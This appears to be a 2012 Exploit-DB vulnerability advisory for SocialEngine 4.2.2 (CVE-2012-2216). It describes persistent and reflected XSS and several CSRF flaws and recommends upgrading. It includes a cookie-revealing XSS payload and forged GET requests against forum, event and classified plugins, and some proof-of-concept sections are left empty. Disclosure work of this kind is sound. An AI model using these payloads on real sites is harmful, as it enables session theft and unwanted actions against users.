socialengine 4.2.2 - Multiple Vulnerabilities

EDB-ID: 18927 CVE: 2012-2216 OSVDB-ID: 82167...
Verified: Author: i4k Published: 2012-05-25
Download Exploit: Source Raw Download Vulnerable App: N/A
Social Engine 4.2.2 Multiples Vulnerabilities
Earlier versions are also possibly vulnerable.


Product: Social Engine 4.2.2
Remote-Exploit: yes
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216


Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.


SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.


== Persistent XSS in music upload. ==

The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.

Proof Of Concept:
POST http://localhost/index.php/music/create

POST data without form-data enctype:

== Persistent XSS in creating events ==


POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&

== Reflected XSS in search form of events area. ==

Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644

format=html&subject=event_1&search=';alert(document.cookie);var a = '

Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '

You will see your PHPSESSID in the alert.

== Multiples CSRF vulnerabilities ==

The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.

A CSRF in the plugin "Forum" allows forcing the owner of the event to do
activities such as:

Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1

Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0

A CSRF in the plugin "Event" allows forcing the owner of the event to do
activities such as:

Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2

Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2

"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2

"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2

A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:

Open the classified listing:
GET /index.php/classifieds/close/1/closed/0

Close the classified listing:
GET /index.php/classifieds/close/1/closed/1


Tested with version 4.2.2 but earlier versions are possibly vulnerable.


Upgrade to Social Engine 4.2.4.


The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2216 to this issue. This is a candidate for inclusion in
the CVE list (, which standardizes names for
security problems.

Tiago Natel de Moura aka "i4k"
SEC+ Information Security Company -
BugSec Security Team -

Tiago Natel de Moura
IT Security Consultant